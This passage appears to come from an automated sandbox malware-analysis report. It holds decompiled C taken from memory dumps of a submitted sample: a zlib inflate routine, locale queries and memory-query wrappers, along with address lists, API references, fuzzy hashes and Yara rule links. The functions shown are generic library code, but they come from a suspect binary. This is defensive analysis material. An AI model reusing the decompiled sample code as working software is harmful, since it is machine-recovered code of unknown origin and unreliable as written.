									 *0x406548 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x406508 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x406500 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x406508 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x406508 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x0040442f
0x00404432
0x00404438
0x00404456
0x00000000
0x00404456
0x00404440
0x00404449
0x0040444f
0x0040445e
0x00404461
0x00404464
0x0040446e
0x0040446e
0x00404470
0x00404473
0x00404475
0x00404475
0x00404477
0x0040447a
0x00000000
0x00000000
0x0040447c
0x0040447e
0x004044e4
0x004044e4
0x00404642
0x00000000
0x00404642
0x00404480
0x00404480
0x00404484
0x00404486
0x00404486
0x00404486
0x00404486
0x00404489
0x0040448a
0x0040448d
0x0040448d
0x00404491
0x00404495
0x004044a3
0x004044a3
0x004044ab
0x004044b1
0x004044b3
0x004044b5
0x004044c5
0x004044d2
0x004044d6
0x004044db
0x004044dd
0x0040455b
0x0040455b
0x004044df
0x004044df
0x004044df
0x0040455d
0x0040455f
0x00404640
0x00404640
0x00000000
0x00404565
0x00404565
0x0040456c
0x00000000
0x00000000
0x00404572
0x00404576
0x004045d2
0x004045d4
0x004045dc
0x004045de
0x004045e0
0x00000000
0x00000000
0x004045e2
0x004045e8
0x004045ea
0x004045ec
0x00404601
0x00404601
0x00404603
0x00404632
0x00404639
0x00000000
0x00404639
0x00404607
0x00404608
0x0040460a
0x0040460c
0x0040460c
0x0040460e
0x00404610
0x00404612
0x00404626
0x00404626
0x00404629
0x0040462b
0x0040462b
0x0040462c
0x0040462c
0x00000000
0x00404614
0x00404614
0x00404614
0x0040461d
0x0040461e
0x00404620
0x00404622
0x00404622
0x00000000
0x00404614
0x00404612
0x004045ee
0x004045f5
0x004045f5
0x004045f7
0x00000000
0x00000000
0x004045f9
0x004045fa
0x004045fd
0x004045ff
0x00000000
0x00000000
0x00000000
0x004045ff
0x00000000
0x004045f5
0x00404578
0x0040457b
0x00404580
0x00000000
0x00000000
0x00404589
0x0040458b
0x00404591
0x00000000
0x00000000
0x00404597
0x0040459d
0x00000000
0x00000000
0x004045a3
0x004045a5
0x004045ae
0x004045b2
0x00000000
0x00000000
0x004045b8
0x004045bb
0x004045bd
0x00000000
0x00000000
0x004045c4
0x004045c6
0x00000000
0x00000000
0x004045c8
0x004045cc
0x00000000
0x00000000
0x00000000
0x004045cc
0x00000000
0x00000000
0x00000000
0x004044b7
0x004044b7
0x004044b7
0x004044be
0x00000000
0x00000000
0x004044c0
0x004044c1
0x004044c3
0x00000000
0x00000000
0x00000000
0x004044c3
0x004044eb
0x004044ed
0x00000000
0x00000000
0x004044fd
0x004044ff
0x00404501
0x00000000
0x00000000
0x00404507
0x0040450e
0x0040453a
0x0040453a
0x0040453c
0x0040453e
0x00404552
0x00404554
0x00000000
0x00000000
0x00000000
0x00000000
0x00404540
0x00404540
0x00404540
0x00404549
0x0040454a
0x0040454c
0x0040454e
0x0040454e
0x00000000
0x00404540
0x00404510
0x00404510
0x00404513
0x00404515
0x00404527
0x00404527
0x0040452a
0x0040452c
0x0040452c
0x0040452d
0x0040452d
0x00404533
0x00404533
0x00000000
0x00000000
0x00000000
0x00000000
0x00404517
0x00404517
0x00404517
0x0040451e
0x00000000
0x00000000
0x00404520
0x00404520
0x00404521
0x00000000
0x00000000
0x00000000
0x00404521
0x00404523
0x00404525
0x00404538
0x00000000
0x00000000
0x00000000
0x00404538
0x00000000
0x00404525
0x00404497
0x0040449a
0x0040449d
0x00000000
0x00000000
0x0040449f
0x004044a1
0x00000000
0x00000000
0x00000000
0x004044a1
0x00404466
0x00404468
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 004044D6

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 72502d8d4e9c41ae36054ae616e0cb1476a32cdeae22c7abe5bc4805d69b7945
Instruction ID: 84de4d88f9b9b85899d974607f6baff0e92ad572e2e4fb621f0432ffb7bcd5f3
Opcode Fuzzy Hash: 72502d8d4e9c41ae36054ae616e0cb1476a32cdeae22c7abe5bc4805d69b7945
Instruction Fuzzy Hash: BF61C2B0600611ABDF29CF29E99072A33A5ABC6314B25847BDB56E72D4F73DDC42C648

Uniqueness

Uniqueness Score: -1,00%

Function 0042E7C2, Relevance: 1.6, Strings: 1, Instructions: 389
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0042E7C2(intOrPtr* _a4, signed char _a8) {
				unsigned int _v8;
				signed char _v12;
				unsigned int _v16;
				signed short _v18;
				unsigned int _v20;
				unsigned int _v24;
				signed char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr* _t235;
				signed char _t236;
				void* _t239;
				signed char* _t241;
				void* _t242;
				signed char* _t243;
				signed char* _t244;
				signed char _t261;
				unsigned int _t264;
				signed char _t266;
				signed int _t267;
				signed int _t269;
				signed int _t283;
				signed int _t284;
				signed char _t285;
				unsigned int _t288;
				signed char _t290;
				signed int _t291;
				signed char _t294;
				signed char _t295;
				void* _t297;
				unsigned int _t299;
				intOrPtr* _t300;
				intOrPtr* _t301;
				intOrPtr* _t302;
				signed char _t306;
				signed char _t308;
				signed int _t309;
				intOrPtr* _t310;
				intOrPtr* _t311;
				intOrPtr* _t312;
				intOrPtr* _t313;
				void* _t318;
				signed char _t321;
				intOrPtr* _t322;
				signed char _t325;
				unsigned int _t326;
				signed char _t330;
				signed char _t331;
				unsigned int _t335;
				signed char _t337;
				signed int _t338;
				intOrPtr _t340;
				unsigned int _t350;
				unsigned int _t363;
				unsigned int _t376;
				signed char _t381;
				unsigned int _t382;
				char* _t415;
				char* _t416;
				char* _t417;
				char* _t418;
				char* _t419;
				intOrPtr* _t420;

				_t235 = _a4;
				_t340 =  *((intOrPtr*)(_t235 + 0x10));
				_t241 =  *_t235 - 1;
				_v48 =  *((intOrPtr*)(_t235 + 4)) + _t241 - 5;
				_t420 =  *((intOrPtr*)(_t235 + 0x1c));
				_t415 =  *((intOrPtr*)(_t235 + 0xc)) - 1;
				_v64 = _t340 - _a8 + _t415;
				_v52 = _t340 + _t415 - 0x101;
				_v40 =  *((intOrPtr*)(_t420 + 0x28));
				_v68 =  *((intOrPtr*)(_t420 + 0x2c));
				_v28 =  *(_t420 + 0x30);
				_v44 =  *((intOrPtr*)(_t420 + 0x34));
				_v8 =  *(_t420 + 0x38);
				_a8 =  *(_t420 + 0x3c);
				_v32 =  *((intOrPtr*)(_t420 + 0x4c));
				_v36 =  *((intOrPtr*)(_t420 + 0x50));
				_v56 = (1 <<  *(_t420 + 0x54)) - 1;
				_v60 = (1 <<  *(_t420 + 0x58)) - 1;
				do {
					_t261 = _a8;
					if(_t261 < 0xf) {
						_a8 = _a8 + 8;
						_t243 =  &(_t241[1]);
						_v8 = _v8 + (( *_t243 & 0x000000ff) << _t261);
						_t241 =  &(_t243[1]);
						_v8 = _v8 + (( *_t241 & 0x000000ff) << _a8);
						_a8 = _a8 + 8;
					}
					_t264 =  *(_v32 + (_v56 & _v8) * 4);
					_v20 = _t264;
					_t350 = _v20;
					_t266 = _t264 >> 0x00000008 & 0x000000ff;
					_v8 = _v8 >> _t266;
					_a8 = _a8 - _t266;
					_v12 = _t266;
					_t267 = _t350 & 0x000000ff;
					_v12 = _t267;
					if(_t267 == 0) {
						L7:
						_t415 = _t415 + 1;
						 *_t415 = _t350 >> 0x10;
						L51:
						if(_t241 >= _v48) {
							L60:
							_t269 = _a8 >> 3;
							_t242 = _t241 - _t269;
							_a8 = _a8 - (_t269 << 3);
							 *_t235 = _t242 + 1;
							 *((intOrPtr*)(_t235 + 0xc)) = _t415 + 1;
							 *((intOrPtr*)(_t235 + 4)) = _v48 - _t242 + 5;
							 *((intOrPtr*)(_t235 + 0x10)) = _v52 - _t415 + 0x101;
							_t236 = _a8;
							 *(_t420 + 0x38) = _v8 & (1 << _a8) - 0x00000001;
							 *(_t420 + 0x3c) = _t236;
							return _t236;
						}
						goto L52;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t283 = _v12;
						if((_t283 & 0x00000010) != 0) {
							break;
						}
						if((_t283 & 0x00000040) != 0) {
							if((_t283 & 0x00000020) == 0) {
								 *(_t235 + 0x18) = "invalid literal/length code";
								L59:
								 *_t420 = 0x1d;
								goto L60;
							}
							 *_t420 = 0xb;
							goto L60;
						}
						_t335 =  *(_v32 + (((1 << _t283) - 0x00000001 & _v8) + (_v20 >> 0x10)) * 4);
						_v20 = _t335;
						_t350 = _v20;
						_t337 = _t335 >> 0x00000008 & 0x000000ff;
						_v8 = _v8 >> _t337;
						_a8 = _a8 - _t337;
						_v12 = _t337;
						_t338 = _t350 & 0x000000ff;
						_v12 = _t338;
						if(_t338 != 0) {
							continue;
						}
						goto L7;
					}
					_t284 = _t283 & 0x0000000f;
					_v16 = _t350 >> 0x10;
					_v12 = _t284;
					if(_t284 == 0) {
						L12:
						_t285 = _a8;
						if(_t285 < 0xf) {
							_a8 = _a8 + 8;
							_t244 =  &(_t241[1]);
							_v8 = _v8 + (( *_t244 & 0x000000ff) << _t285);
							_t241 =  &(_t244[1]);
							_v8 = _v8 + (( *_t241 & 0x000000ff) << _a8);
							_a8 = _a8 + 8;
						}
						_t288 =  *(_v36 + (_v60 & _v8) * 4);
						while(1) {
							_v20 = _t288;
							_t363 = _v20;
							_t290 = _t288 >> 0x00000008 & 0x000000ff;
							_v8 = _v8 >> _t290;
							_a8 = _a8 - _t290;
							_v12 = _t290;
							_t291 = _t363 & 0x000000ff;
							if((_t291 & 0x00000010) != 0) {
								break;
							}
							if((_t291 & 0x00000040) != 0) {
								 *(_t235 + 0x18) = "invalid distance code";
								goto L59;
							}
							_t288 =  *(_v36 + (((1 << _t291) - 0x00000001 & _v8) + (_v18 & 0x0000ffff)) * 4);
						}
						_t294 = _t291 & 0x0000000f;
						_v24 = _t363 >> 0x10;
						_v12 = _t294;
						if(_a8 < _t294) {
							_a8 = _a8 + 8;
							_t241 =  &(_t241[1]);
							_t294 = _v12;
							_v8 = _v8 + (( *_t241 & 0x000000ff) << _a8);
							if(_a8 < _t294) {
								_t241 =  &(_t241[1]);
								_t294 = _v12;
								_v8 = _v8 + (( *_t241 & 0x000000ff) << _a8);
								_a8 = _a8 + 8;
							}
						}
						_t295 = _v12;
						_a8 = _a8 - _t295;
						_v8 = _v8 >> _t295;
						_v24 = _v24 + ((1 << _t294) - 0x00000001 & _v8);
						_t376 = _v24;
						_t297 = _t415 - _v64;
						if(_t376 <= _t297) {
							_t299 = _t415 - _t376;
							do {
								_v16 = _v16 - 3;
								_t300 = _t299 + 1;
								_t416 = _t415 + 1;
								 *_t416 =  *_t300;
								_t301 = _t300 + 1;
								_t417 = _t416 + 1;
								_t299 = _t301 + 1;
								 *_t417 =  *_t301;
								_t415 = _t417 + 1;
								 *_t415 =  *_t299;
							} while (_v16 > 2);
							goto L48;
						} else {
							_t381 = _t376 - _t297;
							_v12 = _t381;
							if(_t381 <= _v68 ||  *((intOrPtr*)(_t420 + 0x1bc0)) == 0) {
								_v20 = _v44 - 1;
								_t306 = _v28;
								if(_t306 != 0) {
									if(_t306 >= _t381) {
										_v20 = _v20 + _t306 - _t381;
										_t308 = _v12;
										if(_t308 >= _v16) {
											L41:
											_t299 = _v20;
											L42:
											_t382 = _v16;
											if(_t382 <= 2) {
												L48:
												if(_v16 != 0) {
													_t302 = _t299 + 1;
													_t415 = _t415 + 1;
													 *_t415 =  *_t302;
													if(_v16 > 1) {
														_t415 = _t415 + 1;
														 *_t415 =  *((intOrPtr*)(_t302 + 1));
													}
												}
												goto L51;
											}
											_t309 = 3;
											_t310 = _v20;
											_t239 = (_t382 - 3) / _t309 + 1;
											do {
												_v16 = _v16 - 3;
												_t311 = _t310 + 1;
												_t418 = _t415 + 1;
												 *_t418 =  *_t311;
												_t312 = _t311 + 1;
												_t419 = _t418 + 1;
												_t310 = _t312 + 1;
												 *_t419 =  *_t312;
												_t415 = _t419 + 1;
												_t239 = _t239 - 1;
												 *_t415 =  *_t310;
											} while (_t239 != 0);
											_t235 = _a4;
											goto L48;
										}
										_v16 = _v16 - _t308;
										_t313 = _v20;
										do {
											_t313 = _t313 + 1;
											_t415 = _t415 + 1;
											_t194 =  &_v12;
											 *_t194 = _v12 - 1;
											 *_t415 =  *_t313;
										} while ( *_t194 != 0);
										L36:
										_t299 = _t415 - _v24;
										_v20 = _t299;
										goto L42;
									}
									_v20 = _v20 + _t306 - _t381 + _v40;
									_t318 = _v12 - _v28;
									if(_t318 >= _v16) {
										goto L41;
									}
									_v16 = _v16 - _t318;
									do {
										_v20 = _v20 + 1;
										_t415 = _t415 + 1;
										_t318 = _t318 - 1;
										 *_t415 =  *_v20;
									} while (_t318 != 0);
									_v20 = _v44 - 1;
									_t321 = _v28;
									if(_t321 >= _v16) {
										goto L41;
									}
									_v16 = _v16 - _t321;
									_v12 = _t321;
									_t322 = _v20;
									do {
										_t322 = _t322 + 1;
										_t415 = _t415 + 1;
										_t183 =  &_v12;
										 *_t183 = _v12 - 1;
										 *_t415 =  *_t322;
									} while ( *_t183 != 0);
									goto L36;
								}
								_v20 = _v20 + _v40 - _t381;
								_t325 = _v12;
								if(_t325 >= _v16) {
									goto L41;
								}
								_v16 = _v16 - _t325;
								_t326 = _v20;
								do {
									_t326 = _t326 + 1;
									_t415 = _t415 + 1;
									_t162 =  &_v12;
									 *_t162 = _v12 - 1;
									 *_t415 =  *_t326;
								} while ( *_t162 != 0);
								goto L36;
							} else {
								 *(_t235 + 0x18) = "invalid distance too far back";
								goto L59;
							}
						}
					}
					_t330 = _a8;
					if(_t330 < _v12) {
						_t241 =  &(_t241[1]);
						_v8 = _v8 + (( *_t241 & 0x000000ff) << _t330);
						_a8 = _a8 + 8;
					}
					_t331 = _v12;
					_v8 = _v8 >> _t331;
					_v16 = _v16 + ((1 << _t331) - 0x00000001 & _v8);
					_a8 = _a8 - _t331;
					goto L12;
					L52:
				} while (_t415 < _v52);
				goto L60;
			}

0x0042e7c8
0x0042e7ce
0x0042e7d4
0x0042e7d9
0x0042e7e2
0x0042e7e9
0x0042e7ec
0x0042e7f6
0x0042e7fc
0x0042e802
0x0042e808
0x0042e80e
0x0042e814
0x0042e81a
0x0042e822
0x0042e829
0x0042e835
0x0042e83e
0x0042e841
0x0042e841
0x0042e847
0x0042e849
0x0042e84d
0x0042e856
0x0042e859
0x0042e85f
0x0042e862
0x0042e862
0x0042e86f
0x0042e872
0x0042e875
0x0042e87b
0x0042e87e
0x0042e881
0x0042e884
0x0042e887
0x0042e88a
0x0042e88f
0x0042e8d8
0x0042e8d8
0x0042e8dc
0x0042eb1a
0x0042eb1d
0x0042eb56
0x0042eb59
0x0042eb5c
0x0042eb61
0x0042eb79
0x0042eb7e
0x0042eb89
0x0042eb97
0x0042eb9a
0x0042eb9e
0x0042eba1
0x0042eba7
0x0042eba7
0x00000000
0x00000000
0x00000000
0x00000000
0x0042e891
0x0042e891
0x0042e891
0x0042e897
0x00000000
0x00000000
0x0042e89c
0x0042eb3f
0x0042eb49
0x0042eb50
0x0042eb50
0x00000000
0x0042eb50
0x0042eb41
0x00000000
0x0042eb41
0x0042e8b6
0x0042e8b9
0x0042e8bc
0x0042e8c2
0x0042e8c5
0x0042e8c8
0x0042e8cb
0x0042e8ce
0x0042e8d1
0x0042e8d6
0x00000000
0x00000000
0x00000000
0x0042e8d6
0x0042e8e6
0x0042e8e9
0x0042e8ec
0x0042e8ef
0x0042e91b
0x0042e91b
0x0042e921
0x0042e923
0x0042e927
0x0042e930
0x0042e933
0x0042e939
0x0042e93c
0x0042e93c
0x0042e949
0x0042e96c
0x0042e96c
0x0042e96f
0x0042e975
0x0042e978
0x0042e97b
0x0042e97e
0x0042e981
0x0042e987
0x00000000
0x00000000
0x0042e951
0x0042eb33
0x00000000
0x0042eb33
0x0042e969
0x0042e969
0x0042e989
0x0042e98f
0x0042e992
0x0042e998
0x0042e99d
0x0042e9a1
0x0042e9a7
0x0042e9aa
0x0042e9b0
0x0042e9b5
0x0042e9bb
0x0042e9be
0x0042e9c1
0x0042e9c1
0x0042e9b0
0x0042e9ca
0x0042e9cd
0x0042e9d4
0x0042e9d7
0x0042e9da
0x0042e9df
0x0042e9e4
0x0042eae4
0x0042eae6
0x0042eae6
0x0042eaea
0x0042eaed
0x0042eaee
0x0042eaf0
0x0042eaf3
0x0042eaf4
0x0042eaf5
0x0042eaf9
0x0042eafe
0x0042eafe
0x00000000
0x0042e9ea
0x0042e9ea
0x0042e9ec
0x0042e9f2
0x0042ea05
0x0042ea08
0x0042ea0d
0x0042ea38
0x0042ea8d
0x0042ea90
0x0042ea96
0x0042eaab
0x0042eaab
0x0042eaae
0x0042eaae
0x0042eab4
0x0042eb02
0x0042eb06
0x0042eb08
0x0042eb0b
0x0042eb10
0x0042eb12
0x0042eb17
0x0042eb18
0x0042eb18
0x0042eb12
0x00000000
0x0042eb06
0x0042eabd
0x0042eac0
0x0042eac3
0x0042eac4
0x0042eac4
0x0042eac8
0x0042eacb
0x0042eacc
0x0042eace
0x0042ead1
0x0042ead2
0x0042ead3
0x0042ead7
0x0042ead8
0x0042ead9
0x0042ead9
0x0042eadd
0x00000000
0x0042eadd
0x0042ea98
0x0042ea9b
0x0042ea9e
0x0042ea9e
0x0042eaa1
0x0042eaa2
0x0042eaa2
0x0042eaa5
0x0042eaa5
0x0042ea81
0x0042ea83
0x0042ea86
0x00000000
0x0042ea86
0x0042ea3f
0x0042ea45
0x0042ea4b
0x00000000
0x00000000
0x0042ea4d
0x0042ea50
0x0042ea50
0x0042ea58
0x0042ea59
0x0042ea5a
0x0042ea5a
0x0042ea62
0x0042ea65
0x0042ea6b
0x00000000
0x00000000
0x0042ea6d
0x0042ea70
0x0042ea73
0x0042ea76
0x0042ea76
0x0042ea79
0x0042ea7a
0x0042ea7a
0x0042ea7d
0x0042ea7d
0x00000000
0x0042ea76
0x0042ea14
0x0042ea17
0x0042ea1d
0x00000000
0x00000000
0x0042ea23
0x0042ea26
0x0042ea29
0x0042ea29
0x0042ea2c
0x0042ea2d
0x0042ea2d
0x0042ea30
0x0042ea30
0x00000000
0x0042eb2a
0x0042eb2a
0x00000000
0x0042eb2a
0x0042e9f2
0x0042e9e4
0x0042e8f1
0x0042e8f7
0x0042e8f9
0x0042e8ff
0x0042e902
0x0042e902
0x0042e906
0x0042e912
0x0042e915
0x0042e918
0x00000000
0x0042eb1f
0x0042eb1f
0x00000000

Strings

(E, xrefs: 0042EB49

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: (E
API String ID: 0-2632418375
Opcode ID: 872969b5643022fed222ad7427078fc7ba8e9352a540d1ec00891d3a7cafbb4c
Instruction ID: 63e9fd73d8d91a6b973ea91a116f3587826ec5f35628c1afa42a9244a40e6749
Opcode Fuzzy Hash: 872969b5643022fed222ad7427078fc7ba8e9352a540d1ec00891d3a7cafbb4c
Instruction Fuzzy Hash: EAF14730A08659DBCB0CCF9AD1A05BDBBB2FF89314B24C19ED4966B745C7386A45CF18

Uniqueness

Uniqueness Score: -1,00%

Function 00446C65, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 0043CC0F: __getptd_noexit.LIBCMT ref: 0043CC10

GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 00446CBE

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: InfoLocale__getptd_noexit
String ID:
API String ID: 2161030339-0
Opcode ID: 2628f1bffba200bd09cf2b2cb0a5608f5ac397ccf8cfd5d0d2675dae4c5275b5
Instruction ID: 1cbb7ca1475f2363e338087fa2279e7e0de3ce3b6af1727b762cfc0e3357a79c
Opcode Fuzzy Hash: 2628f1bffba200bd09cf2b2cb0a5608f5ac397ccf8cfd5d0d2675dae4c5275b5
Instruction Fuzzy Hash: 2521A1B1A00216AFFB249F25DC81BB7B7E8EB06318F11017BE901D6181E778D984DB5A

Uniqueness

Uniqueness Score: -1,00%

Function 00446884, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00446884(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t11;
				void* _t13;
				int _t15;
				signed int _t17;
				signed int _t19;
				signed int _t25;
				void* _t37;
				void* _t38;
				signed int* _t39;
				int _t41;
				signed int _t42;

				_t37 = __edx;
				_t11 =  *0x469acc; // 0x6f159cef
				_v8 = _t11 ^ _t42;
				_t13 = L0043CC0F(_t38, __eflags);
				_t26 = _t13;
				_t39 =  *(L0043CC0F(_t38, __eflags) + 0x3b8);
				_t15 = L00446D3E(_a4);
				asm("sbb ecx, ecx");
				_t41 = _t15;
				_t17 = GetLocaleInfoW(_t41, ( ~( *(_t13 + 0xb0)) & 0xfffff005) + 0x1002,  &_v248, 0xf0);
				if(_t17 != 0) {
					_t19 = E00441969(_t26, _t41,  *((intOrPtr*)(_t26 + 0xa0)),  &_v248);
					__eflags = _t19;
					if(_t19 == 0) {
						_t25 = L00446E18(_t41);
						__eflags = _t25;
						if(_t25 != 0) {
							 *_t39 =  *_t39 | 0x00000004;
							__eflags =  *_t39;
							_t39[2] = _t41;
							_t39[1] = _t41;
						}
					}
					_t23 =  !( *_t39 >> 2) & 0x00000001;
					__eflags =  !( *_t39 >> 2) & 0x00000001;
				} else {
					 *_t39 =  *_t39 & _t17;
					_t23 = _t17 + 1;
				}
				return L00436D7B(_t23, _t26, _v8 ^ _t42, _t37, _t39, _t41);
			}

0x00446884
0x0044688d
0x00446894
0x0044689d
0x004468a2
0x004468a9
0x004468b0
0x004468be
0x004468c0
0x004468dc
0x004468e4
0x004468f8
0x004468ff
0x00446901
0x00446904
0x0044690a
0x0044690c
0x0044690e
0x0044690e
0x00446911
0x00446914
0x00446914
0x0044690c
0x0044691e
0x0044691e
0x004468e6
0x004468e6
0x004468e8
0x004468e8
0x0044692f

APIs

Part of subcall function 0043CC0F: __getptd_noexit.LIBCMT ref: 0043CC10

GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0,0043D1A8,00000000,0043D2C8), ref: 004468DC

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: InfoLocale__getptd_noexit
String ID:
API String ID: 2161030339-0
Opcode ID: e5af0f1aaaf151210d268cbe72d0930cf4912fbcc5d75934ac32fa729790f9bb
Instruction ID: 99805f6804f1ab5f4ca5db6a597c2ec309e8d3bcdc89bca5e8499114e8ff79d8
Opcode Fuzzy Hash: e5af0f1aaaf151210d268cbe72d0930cf4912fbcc5d75934ac32fa729790f9bb
Instruction Fuzzy Hash: 66F02872600215ABDB04AF74DC45AFA73ACDB09314F01007EFA02D7281EB789D019769

Uniqueness

Uniqueness Score: -1,00%

Function 00438195, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00438195(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				signed int _t6;
				int _t8;

				_t5 =  *0x46c9b4; // 0x182c9e40
				_t6 = _t5 ^  *0x469acc;
				if(_t6 == 0) {
					 *0x46bc5c = _a4;
					_t8 = EnumSystemLocalesW(E00438181, 1);
					 *0x46bc5c =  *0x46bc5c & 0x00000000;
					return _t8;
				} else {
					return  *_t6(_a4, _a8, _a12, 0);
				}
			}

0x00438198
0x0043819d
0x004381a3
0x004381be
0x004381c3
0x004381c9
0x004381d1
0x004381a5
0x004381b3
0x004381b3

APIs

EnumSystemLocalesW.KERNEL32(00438181,00000001,?,00446276,00446314,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004381C3

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: bbe0983304e441e35885a50946596c1a562fb1de490714e81933e0e3d2c8676f
Instruction ID: 15a02e5aa15f5b704adc42fd5ec9925aec9397aae3efc36c60c6dd05daa85cbc
Opcode Fuzzy Hash: bbe0983304e441e35885a50946596c1a562fb1de490714e81933e0e3d2c8676f
Instruction Fuzzy Hash: 81E08673540308BBCF01CF90EC41B553BB4F748704F048025F5088A160DBF1A9609F4D

Uniqueness

Uniqueness Score: -1,00%

Function 004381D2, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000000,00000002,?,?,0043912E,?,?,?,00000002,00000000,00000000,00000000), ref: 004381F9

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: bd5a73398b6224f416fccb9a5d24bbeb465f755b65ae62d5c444e787c1013911
Instruction ID: 3cf2e38e016dbcfe08c371d3f2f49bb01abc877398c46f6a3ff8780bd98c1a74
Opcode Fuzzy Hash: bd5a73398b6224f416fccb9a5d24bbeb465f755b65ae62d5c444e787c1013911
Instruction Fuzzy Hash: 9ED06276000149FF8F019FD1EC4586A7B69EB48314F044819F51846521DB76A5619B69

Uniqueness

Uniqueness Score: -1,00%

Function 00402BC4, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00402BC4(intOrPtr _a4, intOrPtr _a8) {
				void* _t3;
				intOrPtr* _t6;

				_t6 =  *0x4064b0;
				_t3 = 0x7f;
				if(_t6 != 0) {
					return RtlNtStatusToDosError( *_t6(_a4, _a8));
				}
				return _t3;
			}

0x00402bc4
0x00402bce
0x00402bcf
0x00000000
0x00402bdc
0x00402be2

APIs

